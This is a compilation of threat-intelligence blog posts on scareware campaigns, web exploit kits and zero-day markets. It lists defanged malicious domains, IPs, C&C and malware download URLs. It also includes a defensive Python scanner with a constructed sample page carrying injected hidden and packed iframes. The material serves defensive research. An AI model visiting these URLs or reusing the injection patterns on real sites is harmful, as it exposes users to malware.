hxxp://pehwitew.cn - 58.17.3.44; 58.20.140.5; 220.248.167.126; 60.191.221.116; 110.52.6.252

Related name servers known to have participated in the campaign:

Related malicious domains known to have participated in the campaign:

Known to have responded to the same malicious IP (60.191.221.123) are also the following malicious domains:

Related malicious name servers known to have participated in the campaign:

Related malicious domains known to have participated in the campaign:

hxxp://xiskizop.cn - 58.17.3.44; 60.191.239.189; 203.93.208.86 - hxxp://ns5.prizeaware.com; hxxp://ns1.grandzap.com; hxxp://ns3.alertjust.com

Related malicious domains known to have participated in the campaigns:

Related malicious name servers known to have participated in the campaign:

Related malicious domains known to have participated in the campaigns:

Related malicious domains known to have participated in the campaign:

Related malicious domains known to have participated in the campaign:

hxxp://litgukab.cn

hxxp://xojyupab.cn

hxxp://ritlarab.cn

hxxp://qeqyukeb.cn

hxxp://fedpijib.cn

hxxp://xumlodob.cn

hxxp://kozgewob.cn

hxxp://fajnahec.cn

hxxp://nedsicic.cn

hxxp://hertuqic.cn

hxxp://linrudoc.cn

hxxp://gilqufuc.cn

hxxp://lijwituc.cn

hxxp://loqbaxuc.cn

hxxp://camxezuc.cn

hxxp://foyxolad.cn

hxxp://bapvusad.cn

hxxp://wokmeyad.cn

hxxp://yizqosed.cn

hxxp://vivwiwef.cn

hxxp://percaqof.cn

hxxp://cepceluf.cn

hxxp://paqhizuf.cn

hxxp://vorvivag.cn

hxxp://maynixeg.cn

hxxp://mujyumig.cn

hxxp://coyrekog.cn

hxxp://xetvetih.cn

hxxp://mugyujuh.cn

hxxp://supsizuh.cn

hxxp://bixtakaj.cn

hxxp://lanmixej.cn

hxxp://worxezej.cn

hxxp://tikgepij.cn

hxxp://yatsanak.cn

hxxp://tucgosak.cn

hxxp://hihnuwak.cn

hxxp://qilfadek.cn

hxxp://zibsitik.cn

hxxp://xetmojok.cn

hxxp://yelsecuk.cn

hxxp://confowuk.cn

hxxp://pozzoxuk.cn

hxxp://savhixal.cn

hxxp://nudtaqel.cn

hxxp://keptavol.cn

hxxp://berqufam.cn

hxxp://wuqrulam.cn

hxxp://goftiwam.cn
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hxxp://vowcajem.cn

hxxp://rizfinim.cn

hxxp://jetgekom.cn

hxxp://letjucun.cn

hxxp://wivwiqap.cn

hxxp://duccesap.cn

hxxp://zamyisap.cn

hxxp://ranpovep.cn

hxxp://kucdawep.cn

hxxp://limjapip.cn

hxxp://ciggecop.cn

hxxp://ziybelop.cn

hxxp://yakquyeq.cn

hxxp://borremiq.cn

hxxp://vuzwesuq.cn

hxxp://rosvocor.cn

hxxp://hakdugas.cn

hxxp://kabmebes.cn

hxxp://purhuves.cn

hxxp://gopmocis.cn

hxxp://cabziqis.cn

hxxp://pomzonos.cn

hxxp://zojvapus.cn

hxxp://nobfemat.cn

hxxp://ritcubav.cn

hxxp://bibbikev.cn

hxxp://daslulev.cn

hxxp://naczoduv.cn

hxxp://betjoqiw.cn

hxxp://yoqlamow.cn

hxxp://jawjeqow.cn

hxxp://zijmivuw.cn

hxxp://dupqozuw.cn

hxxp://fatnudax.cn

hxxp://defrogax.cn

hxxp://kalyahax.cn

hxxp://toztipax.cn

hxxp://gecfopax.cn

hxxp://wuqzubex.cn

hxxp://hexpadix.cn

hxxp://luhnukox.cn

hxxp://vecbibey.cn

hxxp://dimgecey.cn

hxxp://fammuvey.cn

hxxp://zepfabiy.cn

hxxp://gewvamiy.cn

hxxp://pekzariy.cn

hxxp://pixkinaz.cn

hxxp://mecqulez.cn

hxxp://yubreliz.cn
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hxxp://juvmeriz.cn

hxxp://mafcixiz.cn

hxxp://butlezoz.cn

hxxp://xisqapuz.cn

hxxp://jihkohab.cn

hxxp://litgukab.cn

hxxp://xojyupab.cn

hxxp://ritlarab.cn

hxxp://qancabeb.cn

hxxp://xaqkabeb.cn

hxxp://qeqyukeb.cn

hxxp://bobhoneb.cn

hxxp://fedpijib.cn

hxxp://kozgewob.cn

hxxp://mirlacub.cn

hxxp://jokrogub.cn

hxxp://qupbihac.cn

hxxp://viqnijac.cn

hxxp://bucdawac.cn

hxxp://latzoyac.cn

hxxp://ferkogec.cn

hxxp://qujqugec.cn

hxxp://fajnahec.cn

hxxp://saybilec.cn

hxxp://yaxxosec.cn

hxxp://nedsicic.cn

hxxp://cimhijic.cn

hxxp://hertuqic.cn

hxxp://linrudoc.cn

hxxp://mahhekoc.cn

hxxp://pegvijuc.cn

hxxp://camxezuc.cn

hxxp://kossehad.cn

hxxp://bapvusad.cn

hxxp://coffebed.cn

hxxp://xadjeqid.cn

hxxp://pehxarid.cn

hxxp://maknohod.cn

hxxp://yujhaqod.cn

hxxp://vevteyod.cn

hxxp://rinmumud.cn

hxxp://xuldeyud.cn

hxxp://fedrujaf.cn

hxxp://nugnosaf.cn

hxxp://koxpelef.cn

We’ll continue monitoring the campaign and post updates as soon as new developments take place.

Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild Drops Scareware (2018-10-21 23:55)

It’s 2008 and I’ve recently stumbled upon a currently active malicious and fraudulent blackhat SEO campaign successfully enticing users into falling victim to fake security software, also known as scareware, including a variety of dropped fake codecs, largely relying on the acquisition of legitimate traffic through active blackhat SEO campaigns, in this particular case various North Korea news including Mike Tyson’s daughter themed campaigns.

Related malicious domains and redirectors known to have participated in the campaign:

hxxp://fi97.net

hxxp://is-the-boss.com - Email: dantsr@gmail.com

Related malicious domains known to have participated in the campaign:

hxxp://north-korea-news.moviegator.us

Related malicious domains known to have participated in the campaign:

hxxp://petrenko.biz

Related malicious domains known to have participated in the campaign:


Related rogue YouTube accounts known to have participated in the campaign:

hxxp://www.youtube.com/user/afohebac5ar

hxxp://www.youtube.com/user/irufupol0op

Related malicious domains known to have participated in the campaign:


Once executed, a sample of the malware phones back to the following malicious C&C server IPs:

hxxp://mgjmnfgbdfb.com/fff9999.php

hxxp://mgjmnfgbdfb.com/eee9999.php

Once executed, a sample of the malware phones back to the following malicious C&C server IPs:

hxxp://imageempires.com/perce/9dc0266f8077f4b2cd9411ed48ecdda988af00003b1280c

-

47e899830c09969686e8ccfe804c2a7ce5/c0a/perce.jpg

hxxp://imagescolor.com/item/adb0765f302764425d74c12df84cbd29185f9070bb2230a

-

42e0958e050299908de1c5f0844c2579e3/20c/item.gif
hxxp://picturehappiness.com/werber/207/216.jpg

hxxp://archiveexefiles09.com/file.exe

Related malicious URLs known to have participated in the campaign:

hxxp://archiveexefiles09.com/softwarefortubeview.45016.exe

Related malicious URLs known to have participated in the campaign:


We’ll continue monitoring the campaign and post updates as soon as new developments take place.
Historical OSINT - A Diversified Portfolio of Fake Security Software (2018-10-22 13:33)

It’s 2010 and I’ve recently stumbled upon a currently active and circulating malicious and fraudulent portfolio of fake security software, also known as scareware, potentially enticing hundreds of thousands of users to a multitude of malicious software, with the cybercriminals behind the campaign potentially earning fraudulent revenue in the process of monetizing access to malware-infected hosts, largely relying on the utilization of an affiliate network-based type of revenue sharing scheme.

Related malicious domains known to have participated in the campaign:


Related malicious domains known to have participated in the campaign:


Related malicious domains known to have participated in the campaign:


Related malicious domains known to have participated in the campaign:


Related malicious domains known to have participated in the campaign:


We’ll continue monitoring the campaign and post updates as soon as new developments take place.
Historical OSINT - A Diversified Portfolio of Fake Security Software Spotted in the Wild (2018-10-22 13:40)

It’s 2010 and I’ve recently stumbled upon yet another malicious and fraudulent domain portfolio serving a variety of fake security software, also known as scareware, potentially exposing hundreds of thousands of users to a variety of fake security software, with the cybercriminals behind the campaign potentially earning fraudulent revenue, largely relying on the utilization of an affiliate-network based type of revenue-sharing scheme.

Related malicious domains known to have participated in the campaign:


Related malicious domains known to have participated in the campaign:


Related malicious domains known to have participated in the campaign:


Related malicious domains known to have participated in the campaign:

We’ll continue monitoring the campaign and post updates as soon as new developments take place.

Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild Serves Scareware (2018-10-22 14:05)

It’s 2010 and I’ve recently stumbled upon a currently active and circulating malicious and fraudulent blackhat SEO campaign successfully enticing hundreds of thousands globally into interacting with a multitude of rogue and malicious software, also known as scareware.

In this post I’ll profile the campaign, discuss in-depth the tactics, techniques and procedures of the cybercriminals behind it, and provide actionable intelligence on the infrastructure behind it.

Related malicious domains known to have participated in the campaign:

hxxp://ozeqiod.cn?uid=213 - redirector - 64.86.25.201 - hxxp://bexwuq.cn

Sample URL redirection chain:

hxxp://ymarketcoms.cn/?pid=123

Related malicious domains known to have responded to the same malicious C&C server IPs (64.86.25.201):


Related malicious domains known to have participated in the campaign:


We’ll continue monitoring the campaign and post updates as soon as new developments take place.
Historical OSINT - Malicious Economies of Scale - The Emergence of Efficient Platforms for Exploitation - 2007 (2018-10-22 16:23)

Dear blog readers, it’s been several years since I last posted a quality update following my [1]2010 disappearance. As it’s been quite a significant period of time since I last posted a quality update, I feel it’s about time I post a quality update by detailing the Web Malware Exploitation market segment circa 2007, prior to my visit to the GCHQ as an independent contractor with the [2]Honeynet Project.

In this post I’ll discuss the rise of Web malware exploitation kits circa 2007 and offer in-depth discussion on the current and emerging tactics, techniques and procedures (TTPs) of the cybercriminals behind it. With cybercriminals continuing to actively rely on the exploitation of patched and outdated vulnerabilities, and with end users continuing to actively utilize unpatched and outdated third-party software, it shouldn’t be surprising that today’s botnets remain relatively easy to generate and orchestrate for the purpose of committing financial fraud.

Malicious Economies of Scale literally means utilizing attack techniques and exploitation approaches to efficiently, yet cost and time effectively, infect or abuse as many victims as possible, in a combination with an added layer of improved metrics on the success of the campaigns. What are the most popular web exploitation kits that malicious parties use to achieve this? Which are the most popular vulnerabilities used in the majority of the kits? What are the most popular techniques for embedding malware? This white paper will outline this efficiency-centered attack model, and will cover web application vulnerabilities, client-side vulnerabilities, malvertising and black hat SEO (search engine optimization).

An overview of the threats posed by the rising number of malware embedded sites, with a discussion of the exploitation techniques and kits used, as well as detailed summaries of all the high-profile such attacks during 2007.

01. Reaching the Efficiency Scale Through a Diverse Set of Exploited Vulnerabilities

2007 was the year in which client-side vulnerabilities significantly replaced server-side ones as the preferred choice of malicious attackers on their way to achieve the highest possible attack success rate, while keeping their investment in terms of know-how and personal efforts to the minimum. Among the most successful such attacks during 2007 was Storm Worm, the perfect example that the use of outdated and already patched vulnerabilities can result in aggregating the world’s largest botnet according to industry and independent researchers’ estimates. By itself, this attack technique is in direct contradiction with the common wisdom that zero day vulnerabilities are more dangerous than already patched ones, however, the gang behind Storm Worm quickly envisioned this biased statement as false, and by standardizing the exploitation process with the help of outdated vulnerabilities achieved an enormous success.

Years ago, whenever a vulnerability was found and exploit code released in the wild, malicious attackers used to quickly release a do-it-yourself exploitation kit to take advantage of a single exploit only. Nowadays, that’s no longer the case, since by using a single exploit, whether an outdated or zero day one, they’re significantly limiting the probability for a successful attack, and therefore the more diverse and served on-the-fly is the set of exploits used in an attack, the higher would the success rate be.

What was even more interesting to monitor during 2007 was the rise of high-profile sites serving malware, and the decline of malware coming from bogus ones. From the [3]Massive Embedded Malware Attack at a large Italian ISP to the Bank of India, the Syrian Embassy in the U.K, the U.S Consulate in St. Petersburg, China’s CSIRT, Possibility Media’s entire portfolio of E-zines, to the French government’s site related to Libya, these trusted web sites were all found to serve malware through an embedded link pointing back to the attacker’s malicious server. Let’s clarify what malicious economies of scale means, and how they do it.

02. What is malicious economies of scale, and how is it achieved?
Malicious economies of scale is a term I coined in 2007 to summarize the ongoing trend of efficiently attacking online users by standardizing the exploitation process and, by doing so, not just lowering the entry barriers into the process of exploiting a large number of users, but also maintaining a rather static success rate of infections. Malicious economies of scale is the efficient way by which a large number of end users get infected, or have their online abused, with the malicious parties maintaining a static attack model. It’s perhaps more important to also describe how the process is achieved in the first place. The first strategy applied has to do with common sense in respect to the most popular software applications present at the end user’s end, and the first touch-point in this case would be the end user’s Internet browser.

Having its version easily detected and an exploit served, one that directly matches the vulnerable version, is among the web exploitation kits’ main functionalities. Let’s continue with the second strategy, namely to increase the probability of success. As I’ve already pointed out, do-it-yourself single vulnerability exploiting tools matured into web exploitation malware kits, now backed up with a diverse set of exploits targeting different client-side applications, which in this case is the process of increasing the probability of successful infection. The third strategy has to do with attracting the traffic to the malicious server, that as I’ve already discussed is already automatically set to anticipate the upcoming flood of users and serve the malware through exploiting client-side software vulnerabilities on their end. This is mainly done through exploiting remote file inclusion vulnerabilities within the high-profile targets, or through remotely exploitable web application vulnerabilities to basically embed a single line of code, or an obfuscated JavaScript that when deobfuscated will load the malicious URL in between loading the legitimate site.
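
A defender-side check for the embedded-link technique described above, as an added example that is not code from the original article: it flags hidden third-party iframes in a served page and statically decodes `unescape()` literals in inline scripts to see what markup they would write. The function names, the allow-list parameter, the host names and the sample page are all constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Calls that packed inline scripts combine to decode and emit markup at load time.
OBFUSCATION_TOKENS = ("eval(", "unescape(", "fromcharcode", "document.write(")
# String literal handed to unescape(), e.g. unescape('%3Ciframe ...').
UNESCAPE_LITERAL = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.I | re.S)


def is_hidden(attrs):
    """True when the element is sized or styled so a visitor never sees it."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    for dim in ("width", "height"):
        if re.fullmatch(r"[01](px)?", (attrs.get(dim) or "").strip().lower()):
            return True
        if re.search(rf"(?<![-\w]){dim}:[01](px)?(;|$)", style):
            return True
    return False


class EmbedScanner(HTMLParser):
    """Collects (kind, origin, host) findings for one HTML document."""

    def __init__(self, site_host, allowed_hosts, origin):
        super().__init__(convert_charrefs=True)
        self.site_host = site_host.lower()
        self.allowed = {h.lower() for h in allowed_hosts}
        self.origin = origin
        self.findings = []
        self._inline = None  # buffer for the inline <script> being read

    def _foreign_host(self, url):
        """Host of url if it is neither the site, a subdomain, nor allow-listed."""
        host = (urlparse(url).hostname or "").lower()
        own = host == self.site_host or host.endswith("." + self.site_host)
        return host if host and not own and host not in self.allowed else None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        src = attrs.get("src") or ""
        host = self._foreign_host(src)
        if tag == "iframe" and host and is_hidden(attrs):
            self.findings.append(("hidden-iframe", self.origin, host))
        elif tag == "script" and host:
            self.findings.append(("unlisted-script-host", self.origin, host))
        elif tag == "script" and not src:
            self._inline = []

    def handle_data(self, data):
        if self._inline is not None:
            self._inline.append(data)

    def handle_endtag(self, tag):
        if tag != "script" or self._inline is None:
            return
        body, self._inline = "".join(self._inline), None
        # Statically decode unescape() literals and scan what they would write.
        # unquote() covers %XX sequences only; %uXXXX escapes are not handled.
        decoded = []
        for _quote, literal in UNESCAPE_LITERAL.findall(body):
            decoded += scan_page(unquote(literal), self.site_host,
                                 self.allowed, origin="decoded-script")
        if decoded:
            self.findings += decoded
        elif sum(tok in body.lower() for tok in OBFUSCATION_TOKENS) >= 2:
            # Nothing decodable, but two or more packing primitives appear together.
            self.findings.append(("packed-script", self.origin, None))


def scan_page(html, site_host, allowed_hosts=(), origin="page"):
    """Return the findings for html as served by site_host."""
    scanner = EmbedScanner(site_host, allowed_hosts, origin)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a portal page carrying two injected embeds (reserved example domains).
SAMPLE_PAGE = """<html><body>
<h1>Regional news portal</h1>
<script src="/static/site.js"></script>
<script src="https://cdn.example.net/lib.js"></script>
<iframe src="https://video.example.net/player" width="640" height="360"></iframe>
<iframe src="http://injected.example.org/in.php" width="0" height="0" style="display:none"></iframe>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//packed.example.org/x%22%20width%3D1%20height%3D1%3E%3C/iframe%3E'));</script>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_PAGE, "news.example.com", {"cdn.example.net"}):
        print(finding)
```

Run against periodic crawls of your own pages, a diff of the findings between crawls surfaces an embed that appeared without a deployment.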

Popular Malware Embedded Attack Tactics

This part of the article will briefly describe some of the most common attack tactics malicious parties use to embed links to their malicious servers on either high-profile sites, or any other site with a high pagerank, something they’ve started measuring as of recently according to threat intel assessment on an automated system to embed links based on a site’s popularity.

• The “pull” Approach – Blackhat SEO, Harnessing the Trusted Audience of a Hacked Site

In this tactic, malicious parties entirely rely on the end users to reach their malicious server, compared to the second tactic of “pushing” the malicious links to them. This is primarily accomplished through the use of Blackhat SEO tools generating junk content with the idea to successfully attract search engine traffic for popular queries, thus infecting anyone who visits the site, which often appears within the first twenty search results. The second “pull” approach is harnessing the already established trust of a site, such as a major news portal for instance, and by embedding a link to automatically load on the portal, have the users actually “pull” the malware for themselves.

• The “push” Approach – Here’s Your Malware Embedded Link

The “push” approach’s success lies in its simple logic: with end users still worrying about downloading or clicking on email attachments, given the overall lack of understanding on how to protect from sites serving malware, it’s logical to consider that basically sending a link which once visited will automatically infect the visitor through exploiting a client-side vulnerability actually works. Storm Worm is the perfect example, and to demonstrate what malicious economies of scale means once again, it’s worth mentioning Storm’s approach of having an already infected host act as an infection vector itself, compared to its authors having to register multiple domains and change them periodically. The result is malware embedded links exploiting client-side vulnerabilities in the form of an IP address, in this case an already infected host that’s now aiming to infect another one.
• Automatically Exploiting Web Application Vulnerabilities – Mass SQL Injection Attacks

As I’ve already pointed out, malicious parties are not just efficiently scanning for remotely exploitable web application

vulnerabilities or looking for ways to remotely include files on any random host, they’ve started putting efforts into

analyzing the page rank, and overall popularity of a site they could exploit. This prioritizing of the sites to be used for

a “pull” tactic is aiming to achieve the highest possible success rate by targeting a high-trafficked site, where even

though the attack can be detected, the “window of opportunity” while the users were also accessing the malicious

server could be far more beneficial than having a permanent malware link on a less popular site for an indefinite

period of time.

• Malicious Advertisements - Malvertising

Among the most popular traffic acquisition tactics nowadays remains the active utilization of legitimate Web properties for the purpose of socially engineering an ad network provider into featuring a specific malware-serving advertisement at the targeted Web site, including active Web site compromise for the purpose of injecting rogue and malicious ads on the targeted host.

Related posts:

• [4]Historical OSINT - Malicious Malvertising Campaign, Spotted at FoxNews, Serves Scareware

• [5]Cybercriminals Launch Malicious Malvertising Campaign, Thousands of Users Affected

• [6]Managed SWF Injection Cybercrime-friendly Service Fuels Growth Within the Malvertising Market Segment

• Buying Access to Hacked Cpanels or Web Servers

Thanks to a vibrant DIY (do-it-yourself) Web malware exploitation kit culture, including the active utilization of various DIY Web site exploitation and malware-generating tools, cybercriminals continue actively utilizing stolen and compromised accounting data for the purpose of injecting malicious scripts on the targeted host, further compromising the confidentiality, availability and integrity of the targeted host.

• Harvesting accounting data from malware infected hosts

Having administrator access to a domains portfolio, or any type of access through a web application backdoor or direct FTP/SSH, has reached its commercial level a long time ago. In fact, differentiated pricing applies in this case, on the basis of a site’s page rank, whereas I’ve stumbled upon great examples of “underground goods liquidity” as a process, where access to a huge domains portfolio through hacked Cpanels is being offered for cents, with the seller’s main concern that cents are better than nothing, nothing in the sense that she may lose access to the Cpanel before it’s being sold and thus ends up with nothing. Now, let’s discuss the most popular malware exploitation kits currently in the wild.

The Most Popular Web Malware Exploitation Kits

Going into detail about the most common vulnerabilities used in the multitude of web malware exploitation kits could be irrelevant from the perspective of their current state of “modularity”, that is, once the default installation of the kit contains a rather modest set of exploits, the possibility to add new exploits to be used has long reached the point’n’click stage. Even worse, localizing the kits to different languages further contributes to their ease of use and acceptance on a large scale, just as is their open source nature making it easy for coders to use a successful kit’s modules as a foundation for a new one – something that’s happening already, namely the difference between a copycat kit and an original coded from scratch one. Among the most popular malware kits remain:
• A Brief Overview of MPack, IcePack, Zunker, Advanced Pack and Fire Pack

During 2007, Mpack emerged as the most popular malware exploitation kit. Originally available for purchase, by the time copies of the kit started leaking out, anyone from a script kiddie to a pragmatic attacker has obtained a copy of it. Mpack’s main strength is that of its well configured default installation, which in a combination with a rather modest, but then again, modular set of exploits included, as well as its point’n’click level of sophistication, automatically turned it into the default malware kit. Mpack’s malware kit has been widely used on nearly all of the high-profile malware embedded attacks during 2007, however, its popularity resulted in way too much industry attention towards its workings, and therefore, malicious parties started coming up with new kits, still using Mpack as the foundation at least from a theoretical perspective.

The list is endless, the Nuclear Malware kit, Metaphisher, old version of the WebAttacker and the Rootlauncher kit,

with the latest and most advanced innovation named the Random JS Exploitation Kit. Compared to the previous one,

this one is going a step beyond the usual centralized malicious server.

With malicious parties now interested in controlling as many infected hosts with as little effort as possible, client-side vulnerabilities will continue to be largely abused in an efficient way through web malware exploitation kits in 2008. The events that took place during 2007 clearly demonstrate the pragmatic attack approaches malicious parties started applying, namely realizing that an outdated but unpatched on a large scale vulnerability is just as valuable as a zero day one.

1. https://ddanchev.blogspot.com/2018/10/dancho-danchevs-2010-disappearance.html

2. https://speakerdeck.com/ddanchev/cesg-hp-cyberintel-dancho

3. https://ddanchev.blogspot.com/2017/05/historical-osint-inside-2007-2009.html

4. https://ddanchev.blogspot.com/2017/01/historical-osint-malicious-malvertising.html

5. https://ddanchev.blogspot.com/2016/04/cybercriminals-launch-malicious.html

6. https://ddanchev.blogspot.com/2016/08/managed-swf-injection-cybercrime.html

Pay-Per-Exploit Acquisition Vulnerability Programs - Pros and cons? (2018-10-22 17:47)

As [1]ZERODIUM starts paying premium rewards to security researchers to acquire their previously unreported zero-day

exploits affecting multiple operating systems, software and/or devices, a logical question emerges in the context of

the program’s usefulness, the potential benefits, including potential vulnerabilities within the actual acquisition process

- how would the program undermine the security industry, and what would be the eventual outcome for the security

researcher in terms of [2]fueling growth in the cyber warfare market segment?

Having greatly realized the potential of acquiring zero day vulnerabilities for the purpose of actively exploiting end

users, malicious actors have long been aware of the [3]over-the-counter acquisition market model,

further enhancing their capabilities when launching malicious campaigns. Among the most widely [4]spread myths

about zero day vulnerabilities is that [5]zero day vulnerabilities are the primary growth factor of the cybercrime

ecosystem, further resulting in a multitude of malicious activity targeting end users.

and exploit acquisition programs successfully resulting in the launch and establishment of third-party services

and products further populating the security-industry with related products and services potentially acquiring

"know-how" and relevant vulnerability and exploit information from major vendors further launching related

companies and services potentially empowering third-party researchers vendors and individuals including

nation-state actors with potential weaponization capabilities potentially leading to successful target-acquisition

practices on behalf of third-party researchers and individuals.

Becoming a target in the widespread context of third-party vendors and researchers might not be the wisest

approach when undermining potential research and in-house research and benchmarking activities in terms of

evaluating and responding to vulnerabilities and exploits. Vendors looking for ways to efficiently improve the

overall security and product performance in terms of security should consider basic internal benchmarking

practices and should also consider a possible incentive-based type of vulnerability and exploit reward-type of

revenue-sharing program potentially rewarding company employees and researchers with the necessary tools and

incentives to find and discover and report security vulnerabilities and exploits.

Something else worth pointing out in terms of vulnerability research and exploit discovery is the life-cycle of a

zero day vulnerability and exploit, best described as a long-run process in which malicious and fraudulent actors

utilize client-side exploits for the purpose of dropping malicious software on the hosts of the targeted victims.

These actors often rely on outdated and patched vulnerabilities, and on the overall misunderstanding that zero day

vulnerabilities and exploits are the primary growth factor of the security-industry. End users and enterprises are

often unaware of the basic fact that cybercriminals often rely on outdated and patched vulnerabilities, successfully

targeting thousands of users globally on a daily basis.

What used to be a market-segment dominated by DIY (do-it-yourself) exploit and malware-generating tools is

today a market-segment dominated by Web malware-exploitation kits successfully affecting thousands of

users globally on a daily basis. Among the most common misconceptions regarding the utilization of Web

malware-exploitation kits is that the cybercriminals behind them rely on newly discovered exploits and

vulnerabilities, when in fact they rely on [6]outdated and already patched security vulnerabilities and

exploits for the purposes of successfully enticing thousands of users globally into falling victim to

social-engineering driven malicious and fraudulent campaigns.

Despite the evident usefulness from a malicious actor’s point of view when launching malicious campaigns, malicious

actors continue utilizing outdated vulnerabilities for the purpose of launching malicious campaigns, further utilizing a

multitude of social engineering attack vectors to enhance the usefulness of the exploitation vector. Another crucial

aspect of the pay-per-exploit acquisition vulnerability model is the reliance on outdated and unpatched

vulnerabilities for the purpose of launching malicious campaigns, further relying on the basic fact that on the

majority of occasions end users fail to successfully update their third-party applications, often exposing themselves

to a variety of successful malicious campaigns utilizing outdated and unpatched vulnerabilities.

We expect to continue observing an increase in the pay-per-exploit acquisition model, with related acquisition

model participants continuing to acquire vulnerabilities, further fueling growth into the market segment. We expect

that malicious actors will adequately respond through over-the-counter acquisition models including the utilization

of outdated and unpatched vulnerabilities. End users are advised to continue ensuring that their third-party

applications are updated, to build a general security awareness and to ensure that they’re running a fully patched

antivirus solution.

Consider going through the following related posts:

[7]Researchers spot new Web malware exploitation kit

[8]Web malware exploitation kits updated with new Java exploit

[9]Which are the most commonly observed Web exploits in the wild?

[10]Report: Patched vulnerabilities remain prime exploitation vector

[11]Report: malicious PDF files becoming the attack vector of choice

[12]Malvertising campaigns at multiple ad networks lead to Black Hole Exploit Kit

[13]56 percent of enterprise users using vulnerable Adobe Reader plugins

[14]Report: third party programs rather than Microsoft programs responsible for most vulnerabilities

[15]Report: malicious PDF files becoming the attack vector of choice

[16]Malvertising campaigns at multiple ad networks lead to Black Hole Exploit Kit

[17]56 percent of enterprise users using vulnerable Adobe Reader plugins

[18]Report: third party programs rather than Microsoft programs responsible for most vulnerabilities

[19]Report: 64 % of all Microsoft vulnerabilities for 2009 mitigated by Least Privilege accounts

[20]Secunia: popular security suites failing to block exploits

[21]37 percent of users browsing the Web with insecure Java versions

[22]Which are the most commonly observed Web exploits in the wild?

[23]Report: Malicious PDF files comprised 80 percent of all exploits for 2009

[24]Secunia: Average insecure program per PC rate remains high

1. https://zerodium.com/program.html

2. https://www.webroot.com/blog/2013/12/27/cybercrime-trends-2013-year-review/

3. http://www.zdnet.com/article/black-market-for-zero-day-vulnerabilities-still-thriving/

4. https://www.zdnet.com/article/seven-myths-about-zero-day-vulnerabilities-debunked

5. https://www.zdnet.com/article/report-patched-vulnerabilities-remain-prime-exploitation-vector/

6. https://www.zdnet.com/article/a-patched-browser-false-feeling-of-security-or-a-security-utopia-that-actually-exists/

7. https://www.zdnet.com/article/researchers-spot-new-web-malware-exploitation-kit/

8. https://www.zdnet.com/blog/security/web-malware-exploitation-kits-updated-with-new-java-exploit/9849

9. https://www.zdnet.com/blog/security/which-are-the-most-commonly-observed-web-exploits-in-the-wild/10261

10. https://www.zdnet.com/blog/security/report-patched-vulnerabilities-remain-prime-exploitation-vector/8162

11. https://www.zdnet.com/article/report-malicious-pdf-files-becoming-the-attack-vector-of-choice/

12. https://www.zdnet.com/article/malvertising-campaigns-at-multiple-ad-networks-lead-to-black-hole-exploit-kit/

13. https://www.zdnet.com/article/56-percent-of-enterprise-users-using-vulnerable-adobe-reader-plugins/

14. https://www.zdnet.com/article/report-third-party-programs-rather-than-microsoft-programs-responsible-for-most-vulnerabilities/

15. https://www.zdnet.com/article/report-malicious-pdf-files-becoming-the-attack-vector-of-choice/

16. https://www.zdnet.com/article/malvertising-campaigns-at-multiple-ad-networks-lead-to-black-hole-exploit-kit/

17. https://www.zdnet.com/article/56-percent-of-enterprise-users-using-vulnerable-adobe-reader-plugins/

18. https://www.zdnet.com/article/report-third-party-programs-rather-than-microsoft-programs-responsible-for-most-vulnerabilities/

19. https://www.zdnet.com/article/report-64-of-all-microsoft-vulnerabilities-for-2009-mitigated-by-least-privilege-accounts/

20. https://www.zdnet.com/article/secunia-popular-security-suites-failing-to-block-exploits/

21. https://www.zdnet.com/article/37-percent-of-users-browsing-the-web-with-insecure-java-versions/

22. https://www.zdnet.com/article/which-are-the-most-commonly-observed-web-exploits-in-the-wild/

23. https://www.zdnet.com/article/report-malicious-pdf-files-comprised-80-percent-of-all-exploits-for-2009/

24. https://www.zdnet.com/article/secunia-average-insecure-program-per-pc-rate-remains-high/

Cyber Security Project Investment Proposal - DIA Needipedia - Fight Cybercrime and Cyber Jihad With Sensors - Grab Your Copy Today! (2018-12-16 13:52)

Dear blog readers, I decided to share with everyone a currently pending project investment proposal regarding the

upcoming launch of a proprietary Technical Collection analysis platform, with the project proposal draft available on

request as part of [1]DIA’s Needipedia Project Proposal Investment draft or eventually through the [2]Smith Richardson Foundation.

In case you’re interested in working with me for the purpose of implementing the project solution including a

possible investment proposal on your behalf – that also includes a possible VC or an angel investor introduction – I

can be reached at dancho.danchev@hush.com

Looking forward to receiving your comments, questions, feedback and general remarks, including possible

investment proposal requests. Happy Holidays!

Enjoy!

01. Executive summary

The Obmonix platform aims to build the world’s most versatile and comprehensive sensor network for intercepting

cybercrime and cyber jihad activity on a global scale successfully positioning the project as a leading in-house built

provider for actionable intelligence within the Intelligence Community.

02. What are you trying to do?

The Obmonix platform aims to build the world’s most versatile and comprehensive sensor network for intercepting

cybercrime and cyber jihad activity successfully positioning the platform as a leading in-house provider of actionable

intelligence within the Intelligence Community.

03. How is it currently done?

Largely relying on a selected set of outsourced intelligence-gathering providers the Intelligence Community overall

reliance on commercial intelligence gathering providers has successfully positioned the Intelligence Community with

a limited sight in terms of pro-active and systematic response to cybercrime and cyber jihad events globally.

04. What’s new?

Largely relying on the utilization of multiple interception vectors including hybrid-based type of sensor networks the

Intelligence Community is successfully positioned to successfully intercept and proactively respond to a growing set

of cybercrime and cyber jihad events globally.

05. Who cares?

The Intelligence Community largely positioned to take advantage of a growing set of technologies for the purpose

of pro-actively responding to a growing set of cybercrime and cyber jihad events globally is ultimately empowered

to take advantage of modern hybrid-based type of sensor networks for the purpose of successfully intercepting and

responding to a growing set of cybercrime and cyber jihad events globally.

06. What are the risks?

Successfully positioning the provider as a leading provider for actionable intelligence in terms of cybercrime and

cyber jihad events globally within the Intelligence Community will successfully position the Obmonix platform and

its operator as a leading provider of actionable intelligence within the Intelligence Community.

Transmittal Letter

My name is Dancho Danchev. I’m an internationally recognized cybercrime researcher, security blogger and

threat intelligence analyst currently maintaining some of the industry’s leading threat intelligence gathering

information-sharing resources, having successfully contributed to the overall demise of cybercrime internationally,

having successfully monitored, analyzed and processed some of the industry’s major nation-state and malicious actor

type of malicious campaigns over the last decade, leading me to a successful career as a cybercrime researcher,

security blogger and threat intelligence analyst, leading me to a successful launch of my newly launched startup

